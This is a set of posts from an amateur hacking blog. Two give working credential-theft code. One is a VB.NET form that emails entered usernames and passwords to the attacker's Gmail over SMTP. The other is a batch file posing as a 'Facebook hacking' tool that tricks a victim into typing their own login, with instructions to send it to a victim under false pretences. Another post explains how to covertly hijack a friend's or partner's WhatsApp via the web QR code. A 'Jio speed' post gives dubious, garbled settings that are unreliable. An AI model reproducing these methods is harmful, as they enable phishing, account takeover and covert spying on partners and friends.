Showing posts with label email sending keyloger. Show all posts
Showing posts with label email sending keyloger. Show all posts

Tuesday, 8 November 2016

Email Sending Keyloger using Visual Studio


This is email sending keyloger which means you going to code this tool with your email address so that when the victim install this tool and enters his / her login detail it wil send the logs to your email address ..whats the special thing in this tool was.. "you gonna create it"...

first install visual studio..


after that open new project  ========>> windows application

then create a layout for an tool and place the code inside that tool layout copy the below code ( coded by hackfate)


ImportsSystem.Net.Mail
Public Class Form1
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

End Sub

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click

Dim MyMailMessage As New MailMessage()
Try
            MyMailMessage.From = New MailAddress("YOUREMAIL")
            MyMailMessage.To.Add("YOUREMAIL")
            MyMailMessage.Subject = "Log info"
            MyMailMessage.Body = "Name: " & TextBox1.Text & " / Pass: " & TextBox2.Text
            Dim SMTP As New SmtpClient("smtp.gmail.com")
            SMTP.Port = 587
            SMTP.EnableSsl = True
            SMTP.Credentials = New System.Net.NetworkCredential("YOUREMAIL", "YOUREMAILPASSWORD")
            SMTP.Send(MyMailMessage)
        Catch ex As Exception
End Try
End Sub
End Class



Read More

Saturday, 5 November 2016

jio speed



METHOD-1

CHECK YOUR SPEED WITH  SPEED TEST OR NETWORK VELOCITY 
 Its an simple trick.....
just go to your settings ->data limit

now u can see  your used data and the data u set as default its like( o-40 ) something like that
all u have to do is just make it as zero ( 0 )





now check your speed it will become 2xtimes speeder than before


 

METHOD -2 

First of all change your  NETWORK MODE to LTE

APN SETTINGS



  • PORT-8080
  • SERVER-WWW.WFJIO5%4G.COM
  • AUTHENTICATIO TYPE  -  PAP
  • BEARER - LTE
  • ->SAVE


Now download  SURFEASY from googleplay
-> register it and turn it on ''YOU WIL GET HIGH SPEED DATA"




Read More

WHATSAPP HACK



EVERY ONE NEED TO HACK WHATSAPP ACCOUNT OF FRIENDS &&& GF/BF
im going to give the solution for your need...

Its not about using fake tools or softwares..dont waste your time with fake whatsapp tools just follow

my methods...



from your browser make it as desktop view then search for www.web.whatsapp.com






then get your FRIEND or GF/BF mobile.,which you want to spy., open their whatsapp then do the

following its just a 2 sec process so the victim couldnt found out this



you have to just scan that barcode using victim phone thats it .

Read More

NOTEPAD KEYLOGGER






Hey guys its an simple keylogger that you can create your own thing usng notepad no need to download any softwares and tools just follow my methods


step 1- copy this below code and save it as .bat extension


@echo off
color a
title Facebook Hacking :Login:
cls
echo Pleae Enter Your Facebook  Email Address And Password
echo To Hack Any Faceook Account
echo.
echo.
cd"C:\hackedlogs"
set /p user=Email ID:
SET /P pass=Password:
echo Username="%user%" Password="%pass%">hACKED.txt
echo.
echo.
echo Press any key to continue
pause >n
echo Loading.....
echo.
echo.
echo Enter E-Mail ID of Victim
set /p user=Email ID:
echo Username="%user%">Victim.txt
echo.
echo Press any Key to hack this ID
echo.
echo.
pause >
echo.
echo Processing......
echo.
echo.
echo.
echo.
echo.
pause >n




step 2- now send this created file to victim say him its an hacking tool to hack fb or email so he tries to hack someone 


after he open the file it will ask him to enter email and password    
then this keyloger sends u an logs which he enters enjoy it...







Read More